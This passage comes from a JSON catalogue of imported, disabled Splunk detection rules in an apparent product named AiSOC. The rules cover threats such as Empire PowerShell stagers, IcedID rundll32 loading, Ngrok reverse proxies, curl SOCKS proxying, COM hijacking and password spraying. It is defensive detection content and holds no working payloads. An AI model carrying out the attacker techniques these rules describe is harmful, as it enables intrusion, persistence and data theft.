If confirmed malicious, an attacker could gain elevated privileges, making it easier to execute further attacks or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-remote-user-account-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bbc644bc-37df-4e1a-9c88-ec9a53e2038c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_remote_user_account_control.yml" } }, { "id": "splunk-security-content-bbf55ebf-c416-4f62-94d9-4064f2a28014", "type": "detection", "name": "Zscaler Legal Liability Threat Blocked", "description": "The following analytic identifies significant legal liability threats blocked by the Zscaler web proxy. It uses web proxy logs to track destinations, device owners, users, URL categories, and actions associated with legal liability. By leveraging statistics on unique fields, it ensures a precise focus on these threats. This activity is significant for SOC as it helps enforce legal compliance and risk management. 
If confirmed malicious, it could indicate attempts to access legally sensitive or restricted content, potentially leading to legal repercussions and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-legal-liability-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bbf55ebf-c416-4f62-94d9-4064f2a28014", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_legal_liability_threat_blocked.yml" } }, { "id": "splunk-security-content-bc0ca53f-dea6-4906-9b12-09c396fdf1d3", "type": "detection", "name": "Linux Auditd Insert Kernel Module Using Insmod Utility", "description": "The following analytic detects the insertion of a Linux kernel module using the insmod utility. It leverages data from Linux Auditd, focusing on process execution logs that include process names and command-line details. This activity is significant as it may indicate the installation of a rootkit or malicious kernel module, potentially allowing an attacker to gain elevated privileges and bypass security detections. 
If confirmed malicious, this could lead to unauthorized code execution, persistent access, and severe compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-insert-kernel-module-using-insmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc0ca53f-dea6-4906-9b12-09c396fdf1d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_insert_kernel_module_using_insmod_utility.yml" } }, { "id": "splunk-security-content-bc1dc6b8-c954-11eb-bade-acde48001122", "type": "detection", "name": "Detect Empire with PowerShell Script Block Logging", "description": "The following analytic detects suspicious PowerShell execution indicative of PowerShell-Empire activity. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze commands sent to PowerShell, specifically looking for patterns involving `system.net.webclient` and base64 encoding. This behavior is significant as it often represents initial stagers used by PowerShell-Empire, a known post-exploitation framework. 
If confirmed malicious, this activity could allow attackers to download and execute additional payloads, leading to potential code execution, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-empire-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc1dc6b8-c954-11eb-bade-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_empire_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-bc24922d-987c-4645-b288-f8c73ec194c4", "type": "detection", "name": "Cloud Compute Instance Created With Previously Unseen Image", "description": "The following analytic detects the creation of cloud compute instances using previously unseen image IDs. It leverages cloud infrastructure logs to identify new image IDs that have not been observed before. This activity is significant because it may indicate unauthorized or suspicious activity, such as the deployment of malicious payloads or unauthorized access to sensitive information. If confirmed malicious, this could lead to data breaches, unauthorized access, or further compromise of the cloud environment. 
Immediate investigation is required to determine the legitimacy of the instance creation and to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-with-previously-unseen-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc24922d-987c-4645-b288-f8c73ec194c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml" } }, { "id": "splunk-security-content-bc477b57-5c21-4ab6-9c33-668772e7f114", "type": "detection", "name": "Detect Regsvcs Spawning a Process", "description": "The following analytic identifies regsvcs.exe spawning a child process. This behavior is detected using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the parent process is regsvcs.exe. This activity is significant because regsvcs.exe rarely spawns child processes, and such behavior can indicate an attempt to bypass application control mechanisms. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment. 
Immediate investigation is recommended to determine the legitimacy of the spawned process and any associated suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc477b57-5c21-4ab6-9c33-668772e7f114", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_spawning_a_process.yml" } }, { "id": "splunk-security-content-bc5b2304-f241-419b-874a-e927f667b7b6", "type": "detection", "name": "Windows Scheduled Task DLL Module Loaded", "description": "The following analytic detects instances where the taskschd.dll is loaded by processes running in suspicious or writable directories. This activity is unusual, as legitimate processes that load taskschd.dll typically reside in protected system locations. Malware or threat actors may attempt to load this DLL from writable or non-standard directories to manipulate the Task Scheduler and execute malicious tasks. 
By identifying processes that load taskschd.dll in these unsafe locations, this detection helps security analysts flag potentially malicious activity and investigate further to prevent unauthorized system modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-dll-module-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc5b2304-f241-419b-874a-e927f667b7b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_dll_module_loaded.yml" } }, { "id": "splunk-security-content-bc760ca6-8336-11eb-bcbb-acde48001122", "type": "detection", "name": "Resize ShadowStorage volume", "description": "The following analytic identifies the resizing of shadow storage volumes, a technique used by ransomware like CLOP to prevent the recreation of shadow volumes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"vssadmin.exe\" with parameters related to resizing shadow storage. This activity is significant as it indicates an attempt to hinder recovery efforts by manipulating shadow copies. 
If confirmed malicious, this could lead to successful ransomware deployment, making data recovery difficult and increasing the potential for data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/resize-shadowstorage-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc760ca6-8336-11eb-bcbb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/resize_shadowstorage_volume.yml" } }, { "id": "splunk-security-content-bc84d574-708c-467d-b78a-4c1e20171f97", "type": "detection", "name": "Linux Ngrok Reverse Proxy Usage", "description": "The following analytic detects the use of Ngrok on a Linux operating system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments associated with Ngrok. This activity is significant because Ngrok can be used by adversaries to establish reverse proxies, potentially bypassing network defenses. 
If confirmed malicious, this could allow attackers to create persistent, unauthorized access channels, facilitating data exfiltration or further exploitation of the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ngrok-reverse-proxy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc84d574-708c-467d-b78a-4c1e20171f97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ngrok_reverse_proxy_usage.yml" } }, { "id": "splunk-security-content-bc91a8cd-35e7-4bb2-6140-e756cc46fd71", "type": "detection", "name": "Detect AWS Console Login by New User", "description": "The following analytic detects AWS console login events by new users. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen users based on ARN values. This detection is significant because a new user logging into the AWS console could indicate the creation of new accounts or potential unauthorized access. 
If confirmed malicious, this activity could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc91a8cd-35e7-4bb2-6140-e756cc46fd71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_new_user.yml" } }, { "id": "splunk-security-content-bc9cb715-08ba-40c3-9758-6e2b26e455cb", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate multiple valid users using the Kerberos protocol, potentially indicating a Password Spraying attack. It leverages Event 4771, which is generated when the Key Distribution Center fails to issue a Kerberos Ticket Granting Ticket (TGT) due to a wrong password (failure code 0x18). This detection uses statistical analysis, specifically the 3-sigma rule, to identify unusual authentication failures. 
If confirmed malicious, this activity could allow an attacker to gain initial access or elevate privileges within an Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc9cb715-08ba-40c3-9758-6e2b26e455cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-bca48629-7fa2-40d3-9e5d-807564504e28", "type": "detection", "name": "Windows AppLocker Privilege Escalation via Unauthorized Bypass", "description": "The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. 
These EventCodes are related to block events and focus on 5 attempts or more.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-privilege-escalation-via-unauthorized-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bca48629-7fa2-40d3-9e5d-807564504e28", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_privilege_escalation_via_unauthorized_bypass.yml" } }, { "id": "splunk-security-content-bce3ed7c-9b1f-42a0-abdf-d8b123a34836", "type": "detection", "name": "Detect New Login Attempts to Routers", "description": "The following analytic identifies new login attempts to routers. It leverages authentication logs from the ES Assets and Identity Framework, focusing on assets categorized as routers. The detection flags connections that have not been observed in the past 30 days. This activity is significant because unauthorized access to routers can lead to network disruptions or data interception. 
If confirmed malicious, attackers could gain control over network traffic, potentially leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-login-attempts-to-routers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bce3ed7c-9b1f-42a0-abdf-d8b123a34836", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_new_login_attempts_to_routers.yml" } }, { "id": "splunk-security-content-bd1c770f-1b55-411e-b49e-20d07bcac5f8", "type": "detection", "name": "Windows Modify Registry Configure BitLocker", "description": "This analytic is developed to detect suspicious registry modifications targeting BitLocker settings. The malware ShrinkLocker alters various registry keys to change how BitLocker handles encryption, potentially bypassing TPM requirements, enabling BitLocker without TPM, and enforcing specific startup key and PIN configurations. Such modifications can weaken system security, making it easier for unauthorized access and data breaches. 
Detecting these changes is crucial for maintaining robust encryption and data protection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-configure-bitlocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd1c770f-1b55-411e-b49e-20d07bcac5f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_configure_bitlocker.yml" } }, { "id": "splunk-security-content-bd35738c-e93a-4e4f-be24-f6a3680b950a", "type": "detection", "name": "Windows SpeechRuntime COM Hijacking DLL Load", "description": "SpeechRuntime is vulnerable to an attack that allows a user to run code on another user's session remotely and stealthily by exploiting a Windows COM class. When this class is invoked, it launches SpeechRuntime.exe in the context of the currently logged-on user. Because this COM class is susceptible to COM Hijacking, the attacker can alter the registry remotely to point to a malicious DLL. By dropping that DLL on the target system (e.g., via SMB) and triggering the COM object, the attacker causes the malicious DLL to load into SpeechRuntime.exe and execute under the user's context. 
This detection identifies suspicious DLL loads by SpeechRuntime.exe from outside the expected locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-speechruntime-com-hijacking-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd35738c-e93a-4e4f-be24-f6a3680b950a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_speechruntime_com_hijacking_dll_load.yml" } }, { "id": "splunk-security-content-bd3b0187-189b-46c0-be45-f52da2bae67f", "type": "detection", "name": "Windows AdFind Exe", "description": "The following analytic identifies the execution of `adfind.exe` standalone or with specific command-line arguments related to Active Directory queries. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and parent processes. This activity is significant because `adfind.exe` is a powerful tool often used by threat actors like Wizard Spider and FIN6 to gather sensitive AD information. 
If confirmed malicious, this activity could allow attackers to map the AD environment, facilitating further attacks such as privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-adfind-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd3b0187-189b-46c0-be45-f52da2bae67f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_adfind_exe.yml" } }, { "id": "splunk-security-content-bd596c22-ad1e-44fc-b242-817253ce8b08", "type": "detection", "name": "Linux Proxy Socks Curl", "description": "The following analytic detects the use of the `curl` command with proxy-related arguments such as `-x`, `socks`, `--preproxy`, and `--proxy`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an adversary attempting to use a proxy to evade network monitoring and obscure their actions. 
If confirmed malicious, this behavior could allow attackers to bypass security controls, making it difficult to track their activities and potentially leading to unauthorized data access or exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090", "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-proxy-socks-curl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd596c22-ad1e-44fc-b242-817253ce8b08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_proxy_socks_curl.yml" } }, { "id": "splunk-security-content-bd5c311e-a6ea-48ae-a289-19a3398e3648", "type": "detection", "name": "Windows Identify Protocol Handlers", "description": "The following analytic identifies the use of protocol handlers executed via the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because protocol handlers can be exploited to execute arbitrary commands or launch applications, potentially leading to unauthorized actions. 
If confirmed malicious, an attacker could use this technique to gain code execution, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-identify-protocol-handlers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd5c311e-a6ea-48ae-a289-19a3398e3648", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_identify_protocol_handlers.yml" } }, { "id": "splunk-security-content-bd8097ed-958a-4873-87d9-44f2b4d85705", "type": "detection", "name": "GCP Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into Google Workspace with multiple valid users, potentially indicating a Password Spraying attack. It uses Google Workspace login failure events and calculates the standard deviation for source IPs, applying the 3-sigma rule to detect unusual failed authentication attempts. This activity is significant as it may signal an adversary attempting to gain initial access or elevate privileges. 
If confirmed malicious, this could lead to unauthorized access, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bd8097ed-958a-4873-87d9-44f2b4d85705", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-be19b369-fd0c-42be-ae97-c10b6c01638f", "type": "detection", "name": "Windows Potential AppDomainManager Hijack Artifacts Creation", "description": "The following analytic detects the creation of an .exe file along with its corresponding .exe.config and a .dll in the same directory, which is a common pattern indicative of potential AppDomain hijacking or CLR code injection attempts. 
This behavior may signal that a malicious actor is attempting to load a rogue assembly into a legitimate application's AppDomain, allowing code execution under the context of a trusted process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-potential-appdomainmanager-hijack-artifacts-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be19b369-fd0c-42be-ae97-c10b6c01638f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_potential_appdomainmanager_hijack_artifacts_creation.yml" } }, { "id": "splunk-security-content-be254a5c-63e7-11ec-89da-acde48001122", "type": "detection", "name": "Linux Sudoers Tmp File Creation", "description": "The following analytic detects the creation of the \"sudoers.tmp\" file, which occurs when editing the /etc/sudoers file using visudo or another editor on a Linux platform. This detection leverages filesystem data to identify the presence of \"sudoers.tmp\" files. Monitoring this activity is crucial as adversaries may exploit it to gain elevated privileges on a compromised host. 
If confirmed malicious, this activity could allow attackers to modify sudoers configurations, potentially granting them unauthorized access to execute commands as other users, including root, thereby compromising the system's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sudoers-tmp-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be254a5c-63e7-11ec-89da-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sudoers_tmp_file_creation.yml" } }, { "id": "splunk-security-content-be498b9f-d804-4bbf-9fc0-d5448466b313", "type": "detection", "name": "Windows Modify Registry Auto Minor Updates", "description": "The following analytic identifies a suspicious modification to the Windows auto update configuration registry. It detects changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\\\\AutoInstallMinorUpdates\" with a value of \"0x00000000\". This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection and deploy additional payloads. 
If confirmed malicious, this modification could allow attackers to evade defenses, potentially leading to further system compromise and exploitation of zero-day vulnerabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-auto-minor-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be498b9f-d804-4bbf-9fc0-d5448466b313", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_auto_minor_updates.yml" } }, { "id": "splunk-security-content-be6d868d-33b6-4aaa-912e-724fb555b11a", "type": "detection", "name": "Azure AD Successful Authentication From Different Ips", "description": "The following analytic detects an Azure AD account successfully authenticating from multiple unique IP addresses within a 30-minute window. It leverages Azure AD SignInLogs to identify instances where the same user logs in from different IPs in a short time frame. This behavior is significant as it may indicate compromised credentials being used by an adversary, potentially following a phishing attack. 
If confirmed malicious, this activity could allow unauthorized access to corporate resources, leading to data breaches or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-authentication-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "be6d868d-33b6-4aaa-912e-724fb555b11a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_authentication_from_different_ips.yml" } }, { "id": "splunk-security-content-bed761f8-ee29-11eb-8bf3-acde48001122", "type": "detection", "name": "Suspicious IcedID Rundll32 Cmdline", "description": "The following analytic detects a suspicious `rundll32.exe` command line used to execute a DLL file, a technique associated with IcedID malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing the pattern `*/i:*`. This activity is significant as it indicates potential malware attempting to load an encrypted DLL payload, often named `license.dat`. 
If confirmed malicious, this could allow attackers to execute arbitrary code, leading to further system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-icedid-rundll32-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bed761f8-ee29-11eb-8bf3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_icedid_rundll32_cmdline.yml" } }, { "id": "splunk-security-content-bef21d24-297e-45e3-9b9a-c6ac45450474", "type": "detection", "name": "Powershell Remote Services Add TrustedHost", "description": "The following analytic detects the execution of a PowerShell script that modifies the 'TrustedHosts' configuration via EventCode 4104. It leverages PowerShell Script Block Logging to identify commands targeting WSMan settings, specifically those altering or concatenating trusted hosts. This activity is significant as it can indicate attempts to manipulate remote connection settings, potentially allowing unauthorized remote access. 
